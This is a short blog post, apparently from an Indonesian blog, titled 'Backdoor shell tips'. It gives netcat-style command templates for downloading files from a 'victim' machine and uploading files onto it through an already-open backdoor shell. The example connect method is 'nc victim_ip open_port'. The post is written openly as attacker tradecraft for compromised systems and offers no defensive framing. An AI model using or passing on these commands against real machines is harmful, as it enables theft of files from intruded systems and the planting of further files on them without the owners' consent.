Langsung ke konten utama

Postingan

Menampilkan postingan dari April, 2019

Backdoor shell tips

Backdoor shell tips here are some tips for backdoor shell that u may know before. let's check it out.. *Linux backdoor shell tips* *.downloading from victim is done by: echo cat /path/to/download/file|<connect method> >/local/path/to/store/file it works by passing command cat /path/to/download/file when connected and then change the output to /local/path/to/store/file instead of >&2 and then exit (disconnect). *.uploading to victim is done by: echo "echo '`cat /local/path/to/file/to/upload`'>/path/to/upload/file"|<connect method> you can check uploaded file by typing: echo cat /path/to/uploaded/file|<connect method> # warning: output to terminal, add >/file instead *Note: replace <connect method> according to ur method to connect to victim, e.g: nc victim_ip open_port akan diupdate secara berkala jika diperlukan :v pls let me know if u have any other tips that might help others ;) thanks tags: